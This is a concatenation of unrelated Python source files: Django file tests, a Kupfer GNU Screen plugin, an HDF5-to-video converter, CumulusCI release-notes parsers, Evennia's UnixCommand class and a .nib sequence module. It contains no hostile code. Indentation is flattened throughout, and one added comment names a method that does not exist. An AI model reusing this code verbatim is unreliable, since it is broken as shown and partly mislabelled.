self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])
def test_file_iteration_mixed_newlines(self):
f = File(BytesIO(b'one\rtwo\nthree\r\nfour'))
self.assertEqual(list(f), [b'one\r', b'two\n', b'three\r\n', b'four'])
def test_file_iteration_with_unix_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\ntwo\nthree'))
# Set chunk size to create a boundary after \n:
# b'one\n...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\n', b'two\n', b'three'])
def test_file_iteration_with_windows_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\r\ntwo\r\nthree'))
# Set chunk size to create a boundary between \r and \n:
# b'one\r\n...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])
def test_file_iteration_with_mac_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\rtwo\rthree'))
# Set chunk size to create a boundary after \r:
# b'one\r...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])
def test_file_iteration_with_text(self):
f = File(StringIO('one\ntwo\nthree'))
self.assertEqual(list(f), ['one\n', 'two\n', 'three'])
def test_readable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.readable())
self.assertFalse(test_file.readable())
def test_writable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.writable())
self.assertFalse(test_file.writable())
with tempfile.TemporaryFile('rb') as temp, File(temp, name='something.txt') as test_file:
self.assertFalse(test_file.writable())
def test_seekable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.seekable())
self.assertFalse(test_file.seekable())
def test_io_wrapper(self):
content = "vive l'été\n"
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
test_file.write(content.encode('utf-8'))
test_file.seek(0)
wrapper = TextIOWrapper(test_file, 'utf-8', newline='\n')
self.assertEqual(wrapper.read(), content)
# The following seek() call is required on Windows Python 2 when
# switching from reading to writing.
wrapper.seek(0, 2)
wrapper.write(content)
wrapper.seek(0)
self.assertEqual(wrapper.read(), content * 2)
test_file = wrapper.detach()
test_file.seek(0)
self.assertEqual(test_file.read(), (content * 2).encode('utf-8'))
class NoNameFileTestCase(unittest.TestCase):
"""
Other examples of unnamed files may be tempfile.SpooledTemporaryFile or
urllib.urlopen()
"""
def test_noname_file_default_name(self):
self.assertIsNone(File(BytesIO(b'A file with no name')).name)
def test_noname_file_get_size(self):
self.assertEqual(File(BytesIO(b'A file with no name')).size, 19)
class ContentFileTestCase(unittest.TestCase):
def test_content_file_default_name(self):
self.assertIsNone(ContentFile(b"content").name)
def test_content_file_custom_name(self):
"""
The constructor of ContentFile accepts 'name' (#16590).
"""
name = "I can have a name too!"
self.assertEqual(ContentFile(b"content", name=name).name, name)
def test_content_file_input_type(self):
"""
        ContentFile can accept both bytes and unicode, and the retrieved
        content is of the same type.
"""
self.assertIsInstance(ContentFile(b"content").read(), bytes)
if six.PY3:
self.assertIsInstance(ContentFile("español").read(), six.text_type)
else:
self.assertIsInstance(ContentFile("español").read(), bytes)
class DimensionClosingBug(unittest.TestCase):
"""
get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "Pillow not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = BytesIO()
try:
images.get_image_dimensions(empty_io)
finally:
self.assertTrue(not empty_io.closed)
@unittest.skipUnless(Image, "Pillow not installed")
def test_closing_of_filenames(self):
"""
        get_image_dimensions() called with a filename should close the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
        # called with a filename instead of a file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
images.open = catching_open
try:
images.get_image_dimensions(os.path.join(os.path.dirname(upath(__file__)), "test1.png"))
finally:
del images.open
self.assertTrue(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "Pillow not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
with open(img_path, 'rb') as fh:
image = images.ImageFile(fh)
image_pil = Image.open(fh)
size_1 = images.get_image_dimensions(image)
size_2 = images.get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
@unittest.skipUnless(Image, "Pillow not installed")
def test_bug_19457(self):
"""
Regression test for #19457
        get_image_dimensions fails on some PNGs, while Image.size works fine on them
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "magic.png")
size = images.get_image_dimensions(img_path)
with open(img_path, 'rb') as fh:
self.assertEqual(size, Image.open(fh).size)
@unittest.skipUnless(Image, "Pillow not installed")
class GetImageDimensionsTests(unittest.TestCase):
def test_invalid_image(self):
"""
get_image_dimensions() should return (None, None) for the dimensions of
invalid images (#24441).
brokenimg.png is not a valid image and it has been generated by:
$ echo "123" > brokenimg.png
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "brokenimg.png")
with open(img_path, 'rb') as fh:
size = images.get_image_dimensions(fh)
self.assertEqual(size, (None, None))
def test_valid_image(self):
"""
get_image_dimensions() should catch struct.error while feeding the PIL
Image parser (#24544).
Emulates the Parser feed error. Since the error is raised on every feed
attempt, the resulting image size should be invalid: (None, None).
"""
img_path = os.path.join(os.path.dirname(upath(__file__)), "test.png")
with mock.patch('PIL.ImageFile.Parser.feed', side_effect=struct.error):
with open(img_path, 'rb') as fh:
size = images.get_image_dimensions(fh)
self.assertEqual(size, (None, None))
class FileMoveSafeTests(unittest.TestCase):
def test_file_move_overwrite(self):
handle_a, self.file_a = tempfile.mkstemp()
handle_b, self.file_b = tempfile.mkstemp()
# file_move_safe should raise an IOError exception if destination file exists and allow_overwrite is False
with self.assertRaises(IOError):
file_move_safe(self.file_a, self.file_b, allow_overwrite=False)
# should allow it and continue on if allow_overwrite is True
self.assertIsNone(file_move_safe(self.file_a, self.file_b, allow_overwrite=True))
os.close(handle_a)
os.close(handle_b)
class SpooledTempTests(unittest.TestCase):
def test_in_memory_spooled_temp(self):
with tempfile.SpooledTemporaryFile() as temp:
temp.write(b"foo bar baz quux\n")
django_file = File(temp, name="something.txt")
self.assertEqual(django_file.size, 17)
def test_written_spooled_temp(self):
with tempfile.SpooledTemporaryFile(max_size=4) as temp:
temp.write(b"foo bar baz quux\n")
django_file = File(temp, name="something.txt")
self.assertEqual(django_file.size, 17)
|
__kupfer_name__ = _("GNU Screen")
__kupfer_sources__ = ("ScreenSessionsSource", )
__description__ = _("Active GNU Screen sessions")
__version__ = ""
__author__ = "Ulrik Sverdrup <[email protected]>"
import os
from kupfer.objects import Leaf, Action, Source
from kupfer.obj.helplib import FilesystemWatchMixin
from kupfer import utils
def screen_sessions_infos():
"""
Yield tuples of pid, name, time, status
for running screen sessions
"""
pipe = os.popen("screen -list")
output = pipe.read()
for line in output.splitlines():
fields = line.split("\t")
if len(fields) == 4:
empty, pidname, time, status = fields
pid, name = pidname.split(".", 1)
time = time.strip("()")
status = status.strip("()")
yield (pid, name, time, status)
def get_username():
"""Return username for current user"""
import pwd
info = pwd.getpwuid(os.geteuid())
return info[0]
class ScreenSession (Leaf):
"""Represented object is the session pid as string"""
def get_actions(self):
return (AttachScreen(),)
def get_description(self):
for pid, name, time, status in screen_sessions_infos():
if self.object == pid:
break
else:
return "%s (%s)" % (self.name, self.object)
# Handle localization of status
status_dict = {
"Attached": _("Attached"),
"Detached": _("Detached"),
}
status = status_dict.get(status, status)
return (_("%(status)s session (%(pid)s) created %(time)s") %
{"status": status, "pid": pid, "time": time})
def get_icon_name(self):
return "gnome-window-manager"
class ScreenSessionsSource (Source, FilesystemWatchMixin):
"""Source for GNU Screen sessions"""
def __init__(self):
super(ScreenSessionsSource, self).__init__(_("Screen Sessions"))
def initialize(self):
self.screen_dir = (os.getenv("SCREENDIR") or
"/var/run/screen/S-%s" % get_username())
if not os.path.exists(self.screen_dir):
self.screen_dir = None
self.output_debug("Screen socket dir or SCREENDIR not found")
return
self.monitor_token = self.monitor_directories(self.screen_dir)
def get_items(self):
if not self.screen_dir:
return
for pid, name, time, status in screen_sessions_infos():
yield ScreenSession(pid, name)
def get_description(self):
return _("Active GNU Screen sessions")
def get_icon_name(self):
return "terminal"
def provides(self):
yield ScreenSession
class AttachScreen (Action):
"""
"""
def __init__(self):
name = _("Attach")
super(AttachScreen, self).__init__(name)
def activate(self, leaf):
pid = leaf.object
action = "screen -x -R %s" % pid
utils.launch_commandline(action, name=_("GNU Screen"),
in_terminal=True)
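

# Illustrative note (not part of the plugin): screen_sessions_infos() parses
# "screen -list" output and only yields lines that split into exactly four
# tab-separated fields, roughly
#
#     "\t<pid>.<name>\t(<time>)\t(<status>)"
#
# so e.g. "\t12345.work\t(01/02/21 10:00)\t(Detached)" yields
# ("12345", "work", "01/02/21 10:00", "Detached").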
|
#!/usr/bin/env python
"""
Note: VideoWriter expects dimensions (x,y,3) and will fail otherwise, perhaps writing a tiny file
Remember, VLC has a long-standing bug where files under about 3 fps don't play back
Note: the isColor parameter of VideoWriter works on Linux too
Example:
./Convert_HDF5_to_AVI.py ~/data/2012-12-25/extracted.h5 -o ~/data/2012-12-25/ex.ogv -cc4 THEO
Just get percentiles
./Convert_HDF5_to_AVI.py ~/data/2012-12-25/extracted.h5
"""
import sys
import logging
from pathlib import Path
import h5py
import numpy as np
from typing import List, Any
# from scipy.misc import bytescale BUGS
# from scipy.signal import wiener
from histutils import sixteen2eight
from pyimagevideo import VideoWriter
sys.tracebacklimit = 1
usecolor = False
PTILE = [5, 99.95]
"""
all of these codecs worked for me on Ubuntu 14.04 and 16.04
'MJPG' Motion JPEG
'XVID' MPEG-4
'FFV1' Lossless
'FMP4' MPEG-4
** maybe works somewhat
'THEO' ext='.ogv' #must name file .ogv, NOT .avi -- somewhat broken, per messages in ffplay
*** NOT working for me on Ubuntu 16.04 ***
'YV12'
'IYUV'
'Y41P' #silent error, no write
'YUV9' #silent error, no write -- 15.04 writes but nobody knows how to play
'DIB ' # silent error, no write
'CVID' #encoder not found
'MJ2C' #segmentation fault -- 15.04 blank video
"""
def hdf2avi(infn: Path, outfn: Path,
h5key: str, cc4: str,
mm=None, fps=None,
ptile=PTILE, step: int = 1):
"""
infn: HDF5 file containing video to read
outfn: video file
h5key: HDF5 path to video. Assuming shape Nframe x Y x X x 3 (RGB color) or Nframe x Y x X (gray)
"""
if h5key is None:
return
window = step * 100 # number of frames over which to auto contrast
infn = Path(infn).expanduser()
outfn = Path(outfn).expanduser()
assert infn.is_file(), f'{infn} is not a file'
assert outfn.suffix in ('.ogv', '.mkv', '.avi')
if cc4 == 'THEO':
assert outfn.suffix == '.ogv'
if outfn.is_file():
raise IOError(f'video output {outfn} already exists.')
# %% open HDF5 video for parameters
with h5py.File(infn, 'r') as f:
N, y, x = f[h5key].shape[:3]
Next = N // step
print(f'converting {Next} / {N} frames sized {x} x {y} from {infn} to {outfn}')
# %% initialize OpenCV video writer
if N < 100:
print(f'picking FPS=4, lossless codec FFV1 due to small amount Nframe {N}')
fps = 4
            outfn = outfn.with_suffix('.avi')
cc4 = 'FFV1'
window = step * Next // 10
elif fps is None:
fps = 20
if fps <= 3:
logging.warning('FPS<=3 might not work with some AVI players e.g. VLC')
h: Any = VideoWriter(outfn, cc4, (x, y), fps, usecolor)
# %% loop over HDF5 video
for i in range(0, N, step):
if not i % window:
if mm is None:
minmax = np.percentile(f[h5key][i:i + window:step, :, :], ptile, interpolation='nearest')
else:
minmax = mm
if minmax[0] != minmax[1]:
print(f'{i/N*100:.1f} % min/max {minmax}\r', end="")
else:
logging.error(f'{i/N*100:.1f} % Min==max no input image contrast')
im = f[h5key][i, :, :]
# I = wiener(I,wienernhood)
# img = bytescale(I, minmax[0], minmax[1]) BUG
img = sixteen2eight(im, minmax)
h.write(img)
# %% close video
h.release()
def getprc(fn: Path, key: str, stride: int = 60, ptile: List[float] = PTILE):
""" plot some file statistics to help decide min/max"""
fn = Path(fn).expanduser()
fGB = fn.stat().st_size / 1e9
print(f'sampling {ptile} percentiles {fn}, reading {1/stride*fGB:.1f} of {fGB:.1f} GB')
with h5py.File(fn, 'r') as f:
prc = np.percentile(f[key][::stride, ...], ptile, interpolation='nearest')
print(f'percentiles {ptile}: {prc}')
def findvidvar(fn: Path):
"""
    guesses which variable holds the video in an HDF5 file
    by finding the largest (by number of elements) variable that is 3-D or 4-D
"""
fn = Path(fn).expanduser()
x = {}
with h5py.File(fn, 'r') as f:
for v in f:
if f[v].ndim in (3, 4):
x[v] = f[v].size
vid = max(x, key=x.get)
print(f'using "{vid}" as video variable in {fn}')
return vid
if __name__ == '__main__':
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
from argparse import ArgumentParser
p = ArgumentParser()
p.add_argument('infn', help='HDF5 video file to read')
    p.add_argument('outfn', help='video file to write e.g. cool.avi', nargs='?')
p.add_argument('-k', '--h5key', help='key to HDF5 video (variable in HDF5 file)')
p.add_argument('-cc4', help='video codec CC4 code', default='FMP4')
    p.add_argument('-minmax', help='minimum, maximum values. Automatic if not specified.', nargs=2, type=float)
p.add_argument('-fps', help='frames/sec of output video', type=int, default=None)
p.add_argument('-s', '--step', help='take every Nth frame (default 1)', type=int, default=1)
P = p.parse_args()
h5key = findvidvar(P.infn) if P.h5key is None else P.h5key
if not P.outfn:
getprc(P.infn, h5key)
else:
hdf2avi(P.infn, P.outfn, h5key, P.cc4, P.minmax, P.fps, step=P.step)
|
import re
import urllib.parse
import github3.exceptions
from cumulusci.core.exceptions import GithubApiNotFoundError
from cumulusci.oauth.salesforce import PROD_LOGIN_URL, SANDBOX_LOGIN_URL
from .exceptions import GithubIssuesError
class BaseChangeNotesParser(object):
def __init__(self, title):
self.title = title
self.content = []
def parse(self):
raise NotImplementedError()
def render(self, existing_content=""):
return "# {}\r\n\r\n{}".format(self.title, self._render())
def _render(self):
raise NotImplementedError()
class ChangeNotesLinesParser(BaseChangeNotesParser):
def __init__(self, release_notes_generator, title):
super(ChangeNotesLinesParser, self).__init__(title)
self.release_notes_generator = release_notes_generator
self.title = title
self._in_section = False
self.h2 = {} # dict of h2 sections - key=header, value is list of lines
self.h2_title = None # has value when in h2 section
def parse(self, change_note):
"""Returns True if a line was added to self._add_line was called, False otherwise"""
if not self.title:
self._in_section = True
line_added = False
change_note = self._process_change_note(change_note)
if not change_note:
return False
for line in change_note.splitlines():
line = self._process_line(line)
# Look for the starting line of the section
if self._is_start_line(line):
self._in_section = True
self.h2_title = None
continue
# Look for h2
if line.startswith("## "):
self.h2_title = re.sub(r"\s+#+$", "", line[3:]).lstrip()
continue
# Add all content once in the section
if self._in_section:
# End when the end of section is found
if self._is_end_line(line):
self._in_section = False
self.h2_title = None
continue
# Skip excluded lines
if self._is_excluded_line(line):
continue
self._add_line(line)
if self.title:
line_added = True
self._in_section = False
return line_added
def _process_change_note(self, change_note):
# subclasses override this if some manipulation is needed
return change_note
def _process_line(self, line):
try:
line = str(line, "utf-8")
except TypeError:
pass
return line.rstrip()
def _is_excluded_line(self, line):
if not line:
return True
def _is_start_line(self, line):
if self.title:
return line.upper() == "# {}".format(self.title.upper())
def _is_end_line(self, line):
# Also treat any new top level heading as end of section
if line.startswith("# "):
return True
def _add_line(self, line):
line = self._add_link(line)
if self.h2_title:
if self.h2_title not in self.h2:
self.h2[self.h2_title] = []
self.h2[self.h2_title].append(line)
return
self.content.append(line)
def _add_link(self, line):
return line
def render(self, existing_content=""):
if not self.content and not self.h2:
return ""
content = []
content.append(self._render_header())
if self.content:
content.append(self._render_content())
if self.h2:
content.append(self._render_h2())
return "\r\n".join(content)
def _render_header(self):
return "# {}\r\n".format(self.title)
def _render_content(self):
return "\r\n".join(self.content)
def _render_h2(self):
content = []
for h2_title in self.h2.keys():
content.append("\r\n## {}\r\n".format(h2_title))
content.append("\r\n".join(self.h2[h2_title]))
return "\r\n".join(content)
class GithubLinesParser(ChangeNotesLinesParser):
def __init__(self, release_notes_generator, title):
super(GithubLinesParser, self).__init__(release_notes_generator, title)
self.link_pr = release_notes_generator.link_pr
self.pr_number = None
self.pr_url = None
def _process_change_note(self, pull_request):
self.pr_number = pull_request.number
self.pr_url = pull_request.html_url
return pull_request.body
def _add_link(self, line):
if self.link_pr:
line += " [[PR{}]({})]".format(self.pr_number, self.pr_url)
return line
class IssuesParser(ChangeNotesLinesParser):
def __init__(self, release_notes_generator, title, issue_regex=None):
super(IssuesParser, self).__init__(release_notes_generator, title)
self.issue_regex = issue_regex or self._get_default_regex()
def _add_line(self, line):
# find issue numbers per line
issue_numbers = re.findall(self.issue_regex, line, flags=re.IGNORECASE)
for issue_number in issue_numbers:
self.content.append(int(issue_number))
def _get_default_regex(self):
return r"#(\d+)"
def _render_content(self):
issues = []
for issue in sorted(self.content):
issues.append("#{}".format(issue))
return "\r\n".join(issues)
class GithubIssuesParser(IssuesParser):
ISSUE_COMMENT = {
"beta": "Included in beta release",
"prod": "Included in production release",
}
def __init__(self, release_notes_generator, title, issue_regex=None):
super(GithubIssuesParser, self).__init__(
release_notes_generator, title, issue_regex
)
if not release_notes_generator.has_issues:
raise GithubIssuesError(
"Cannot use {}".format(self.__class__.__name__)
+ " because issues are disabled for this repository."
)
self.link_pr = release_notes_generator.link_pr
self.pr_number = None
self.pr_url = None
self.publish = release_notes_generator.do_publish
self.github = release_notes_generator.github
def _add_line(self, line):
# find issue numbers per line
issue_numbers = re.findall(self.issue_regex, line, flags=re.IGNORECASE)
for issue_number in issue_numbers:
self.content.append(
{
"issue_number": int(issue_number),
"pr_number": self.pr_number,
"pr_url": self.pr_url,
}
)
def _get_default_regex(self):
keywords = (
"close",
"closes",
"closed",
"fix",
"fixes",
"fixed",
"resolve",
"resolves",
"resolved",
)
return r"(?:{})\s\[?#(\d+)\]?".format("|".join(keywords))
def _render_content(self):
content = []
for item in sorted(self.content, key=lambda k: k["issue_number"]):
issue = self._get_issue(item["issue_number"])
txt = "#{}: {}".format(item["issue_number"], issue.title)
if self.link_pr:
txt += " [[PR{}]({})]".format(item["pr_number"], item["pr_url"])
content.append(txt)
if self.publish:
self._add_issue_comment(issue)
return "\r\n".join(content)
def _get_issue(self, issue_number):
try:
issue = self.github.issue(
self.release_notes_generator.github_info["github_owner"],
self.release_notes_generator.github_info["github_repo"],
issue_number,
)
except github3.exceptions.NotFoundError:
raise GithubApiNotFoundError("Issue #{} not found".format(issue_number))
return issue
def _process_change_note(self, pull_request):
self.pr_number = pull_request.number
self.pr_url = pull_request.html_url
return pull_request.body
def _add_issue_comment(self, issue):
# Ensure all issues have a comment on which release they were fixed
prefix_beta = self.release_notes_generator.github_info["prefix_beta"]
prefix_prod = self.release_notes_generator.github_info["prefix_prod"]
# ParentPullRequestNotesGenerator doesn't utilize a current_tag
if not hasattr(self.release_notes_generator, "current_tag"):
return
elif self.release_notes_generator.current_tag.startswith(prefix_beta):
is_beta = True
elif self.release_notes_generator.current_tag.startswith(prefix_prod):
is_beta = False
else:
# not production or beta tag, don't comment
return
if is_beta:
comment_prefix = self.ISSUE_COMMENT["beta"]
version_parts = re.findall(
r"{}(\d+\.\d+)-Beta_(\d+)".format(prefix_beta),
self.release_notes_generator.current_tag,
)
version_str = "{} (Beta {})".format(*version_parts[0])
else:
comment_prefix = self.ISSUE_COMMENT["prod"]
version_str = self.release_notes_generator.current_tag.replace(
prefix_prod, ""
)
has_comment = False
for comment in issue.comments():
if comment.body.startswith(comment_prefix):
has_comment = True
break
if not has_comment:
issue.create_comment("{} {}".format(comment_prefix, version_str))
class InstallLinkParser(ChangeNotesLinesParser):
def parse(self, change_note):
# There's no need to parse lines, this parser gets its values from task options
return False
def render(self, existing_content=""):
version_id = self.release_notes_generator.version_id
trial_info = self.release_notes_generator.trial_info
if (
not version_id
and not self.release_notes_generator.sandbox_date
and not self.release_notes_generator.production_date
and not trial_info
):
return existing_content
result = [self._render_header()]
if (
self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("## Push Schedule")
if self.release_notes_generator.sandbox_date:
result.append(
f"Sandbox orgs: {self.release_notes_generator.sandbox_date}"
)
if self.release_notes_generator.production_date:
result.append(
f"Production orgs: {self.release_notes_generator.production_date}",
)
if version_id:
version_id = urllib.parse.quote_plus(version_id)
if (
self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("")
result += [
"Sandbox & Scratch Orgs:",
f"{SANDBOX_LOGIN_URL}/packaging/installPackage.apexp?p0={version_id}",
"",
"Production & Developer Edition Orgs:",
f"{PROD_LOGIN_URL}/packaging/installPackage.apexp?p0={version_id}",
]
if trial_info:
if (
version_id
or self.release_notes_generator.sandbox_date
or self.release_notes_generator.production_date
):
result.append("")
result += ["## Trialforce Template ID", f"{trial_info}"]
return "\r\n".join(result)
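# Hedged usage sketch (not part of the original module): a quick illustration
# of how the keyword regex built in _get_issue_message() matches
# "<keyword> #<number>" references in change notes. Only the two keywords
# visible above ("resolves", "resolved") are used here; the real keyword
# list is longer.
if __name__ == "__main__":
    import re

    pattern = r"(?:{})\s\[?#(\d+)\]?".format("|".join(("resolves", "resolved")))
    for line in ("resolves #123", "resolved [#456]", "see #789"):
        match = re.search(pattern, line)
        print(line, "->", match.group(1) if match else None)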
|
"""
Unix-like Command style parent
Evennia contribution, Vincent Le Geoff 2017
This module contains a command class that allows for unix-style command syntax in-game, using
--options, positional arguments and flags like -n 10, similarly to a unix command. It might not be
the best syntax for the average player, but it can be really useful for builders who need a single
command to do many things with many options. It uses the ArgumentParser from Python's standard
library under the hood.
To use it, inherit from `UnixCommand` (defined in this module) in your own commands. You need
to override two methods:
- The `init_parser` method, which adds options to the parser. Note that you should normally
*not* override the normal `parse` method when inheriting from `UnixCommand`.
- The `func` method, called to execute the command once parsed (like any Command).
Here's a short example:
```python
class CmdPlant(UnixCommand):
'''
Plant a tree or plant.
This command is used to plant something in the room you are in.
Examples:
plant orange -a 8
plant strawberry --hidden
plant potato --hidden --age 5
'''
key = "plant"
def init_parser(self):
"Add the arguments to the parser."
# 'self.parser' inherits `argparse.ArgumentParser`
self.parser.add_argument("key",
help="the key of the plant to be planted here")
self.parser.add_argument("-a", "--age", type=int,
default=1, help="the age of the plant to be planted")
self.parser.add_argument("--hidden", action="store_true",
help="should the newly-planted plant be hidden to players?")
def func(self):
"func is called only if the parser succeeded."
# 'self.opts' contains the parsed options
key = self.opts.key
age = self.opts.age
hidden = self.opts.hidden
self.msg("Going to plant '{}', age={}, hidden={}.".format(
key, age, hidden))
```
To see the full power of argparse and the types of supported options, visit
[the documentation of argparse](https://docs.python.org/2/library/argparse.html).
"""
import argparse
import shlex
from textwrap import dedent
from evennia import Command, InterruptCommand
from evennia.utils.ansi import raw
class ParseError(Exception):
"""An error occurred during parsing."""
pass
class UnixCommandParser(argparse.ArgumentParser):
"""A modifier command parser for unix commands.
This parser is used to replace `argparse.ArgumentParser`. It
is aware of the command calling it, and can more easily report to
the caller. Some features (like the "brutal exit" of the original
parser) are disabled or replaced. This parser is used by UnixCommand;
creating one directly is neither recommended nor necessary. Even
adding a sub-command will use this replacement parser automatically.
"""
def __init__(self, prog, description="", epilog="", command=None, **kwargs):
"""
Build a UnixCommandParser with a link to the command using it.
Args:
prog (str): the program name (usually the command key).
description (str): a very brief line to show in the usage text.
epilog (str): the epilog to show below options.
command (Command): the command calling the parser.
Kwargs:
Additional keyword arguments are directly sent to
`argparse.ArgumentParser`. You will find them on the
[parser's documentation](https://docs.python.org/2/library/argparse.html).
Note:
It's doubtful you would need to create this parser manually.
The `UnixCommand` does that automatically. If you create
sub-commands, this class will be used.
"""
prog = prog or command.key
super(UnixCommandParser, self).__init__(
prog=prog, description=description,
conflict_handler='resolve', add_help=False, **kwargs)
self.command = command
self.post_help = epilog
def n_exit(code=None, msg=None):
raise ParseError(msg)
self.exit = n_exit
# Replace the -h/--help
self.add_argument("-h", "--hel", nargs=0, action=HelpAction,
help="display the command help")
def format_usage(self):
"""Return the usage line.
Note:
This method is present to return the raw-escaped usage line,
in order to avoid unintentional color codes.
"""
return raw(super(UnixCommandParser, self).format_usage())
def format_help(self):
"""Return the parser help, including its epilog.
Note:
This method is present to return the raw-escaped help,
in order to avoid unintentional color codes. Color codes
in the epilog (the command docstring) are supported.
"""
autohelp = raw(super(UnixCommandParser, self).format_help())
return "\n" + autohelp + "\n" + self.post_help
def print_usage(self, file=None):
"""Print the usage to the caller.
Args:
file (file-object): not used here, the caller is used.
Note:
This method will override `argparse.ArgumentParser`'s in order
to not display the help on stdout or stderr, but to the
command's caller.
"""
if self.command:
self.command.msg(self.format_usage().strip())
def print_help(self, file=None):
"""Print the help to the caller.
Args:
file (file-object): not used here, the caller is used.
Note:
This method will override `argparse.ArgumentParser`'s in order
to not display the help on stdout or stderr, but to the
command's caller.
"""
if self.command:
self.command.msg(self.format_help().strip())
class HelpAction(argparse.Action):
"""Override the -h/--help action in the default parser.
Using the default -h/--help would call the exit function in different
ways, preventing the entire help message from being provided. Hence
this override.
"""
def __call__(self, parser, namespace, values, option_string=None):
"""If asked for help, display to the caller."""
if parser.command:
parser.command.msg(parser.format_help().strip())
parser.exit(0, "")
class UnixCommand(Command):
"""
Unix-type commands, supporting short and long options.
This command syntax uses the Unix-style commands with short options
(-X) and long options (--something). The `argparse` module is
used to parse the command.
In order to use it, you should override two methods:
- `init_parser`: this method is called when the command is created.
It can be used to set options in the parser. `self.parser`
contains the `argparse.ArgumentParser`, so you can add arguments
here.
- `func`: this method is called to execute the command, but after
the parser has checked the arguments given to it are valid.
You can access the namespace of valid arguments in `self.opts`
at this point.
The help of UnixCommands is derived from the docstring, in a
slightly different way than usual: the first line of the docstring
is used to represent the program description (the very short
line at the top of the help message). The other lines below are
used as the program's "epilog", displayed below the options. This
means you don't have to describe the options in your docstring;
they will be automatically provided by the parser and displayed
accordingly. The `argparse` module provides a default '-h' or
'--help' option on the command. Typing |whelp commandname|n will
display the same as |wcommandname -h|n, though this behavior can
be changed.
"""
def __init__(self, **kwargs):
"""
The lockhandler works the same as for objects.
optional kwargs will be set as properties on the Command at runtime,
overloading eventual same-named class properties.
"""
super(UnixCommand, self).__init__(**kwargs)
# Create the empty UnixCommandParser, inheriting argparse.ArgumentParser
lines = dedent(self.__doc__.strip("\n")).splitlines()
description = lines[0].strip()
epilog = "\n".join(lines[1:]).strip()
self.parser = UnixCommandParser(None, description, epilog, command=self)
# Fill the argument parser
self.init_parser()
def init_parser(self):
"""
Configure the argument parser, adding in options.
Note:
This method is to be overridden in order to add options
to the argument parser. Use `self.parser`, which contains
the `argparse.ArgumentParser`. You can, for instance,
use its `add_argument` method.
"""
pass
def func(self):
"""Override to handle the command execution."""
pass
def get_help(self, caller, cmdset):
"""
Return the help message for this command and this caller.
Args:
caller (Object or Player): the caller asking for help on the command.
cmdset (CmdSet): the command set (if you need additional commands).
Returns:
docstring (str): the help text to provide the caller for this command.
"""
return self.parser.format_help()
def parse(self):
"""
Process arguments provided in `self.args`.
Note:
You should not override this method. Consider overriding
`init_parser` instead.
"""
try:
self.opts = self.parser.parse_args(shlex.split(self.args))
except ParseError as err:
msg = str(err)
if msg:
self.msg(msg)
raise InterruptCommand
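# Hedged sketch (not part of the original contrib): the parser above is also
# used automatically for argparse sub-commands, since add_subparsers()
# defaults to the class of the calling parser. The command below is invented
# purely to illustrate that; adapt it freely.
class CmdGoods(UnixCommand):
    """
    Manage goods in a shop.
    Examples:
      goods add sword --price 20
      goods del sword
    """

    key = "goods"

    def init_parser(self):
        "Add an 'add' and a 'del' sub-command to the parser."
        subparsers = self.parser.add_subparsers(dest="action")
        add = subparsers.add_parser("add", help="add a new good")
        add.add_argument("name", help="name of the good")
        add.add_argument("--price", type=int, default=1,
                         help="price of the good")
        delete = subparsers.add_parser("del", help="remove a good")
        delete.add_argument("name", help="name of the good to remove")

    def func(self):
        "Called only if parsing succeeded."
        self.msg("action={}, options={}".format(self.opts.action,
                                                vars(self.opts)))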
|
'''Functions and classes used to interface with .nib files as created by Jim
Kent's nibFrag and faToNib utilities.'''
import glob
import math
import os
import struct
import sys
import warnings
from cStringIO import StringIO
from collections import defaultdict as dd
from chipsequtil import reverse_complement, get_file_parts, BEDFile
# module fields
NOMASK,MASK,HARDMASK = range(3)
class NibException(Exception) : pass
def _nib_fd(nib) :
'''Returns filename and file descriptor for nib, detecting whether it is a \
path or fd appropriately'''
# check to see if nib is a file or a string
if isinstance(nib,file) :
nib_fn = nib.name
nib.seek(0)
nib_f = nib
elif isinstance(nib,str) :
nib_fn = nib
nib_f = open(nib,'rb')
else :
raise NibException('Incompatible .nib argument %s with type %s, needs to \
be either <type \'file\'> or <type \'str\'>'%(str(nib),type(nib)))
return nib_fn, nib_f
def get_nib(nib,start=0,end=-1,strand='+',mask=NOMASK,name=None,dbHeader=None,tbaHeader=None) :
'''Return a (header,sequence) tuple representing this nibFrag record'''
headers = get_nib_header_batch(nib,[(start,end,strand,name,dbHeader,tbaHeader),])
seqs = get_nib_seq_batch(nib,[(start,end,strand)],mask)
return headers[0], seqs[0]
def get_nib_batch(nib,queries,mask=NOMASK) :
'''Batch interface for fetching fasta records. Returns tuple of lists
(headers,sequences)'''
headers = get_nib_header_batch(nib,queries)
seqs = get_nib_seq_batch(nib,[x[:3] for x in queries],mask=mask)
return headers, seqs
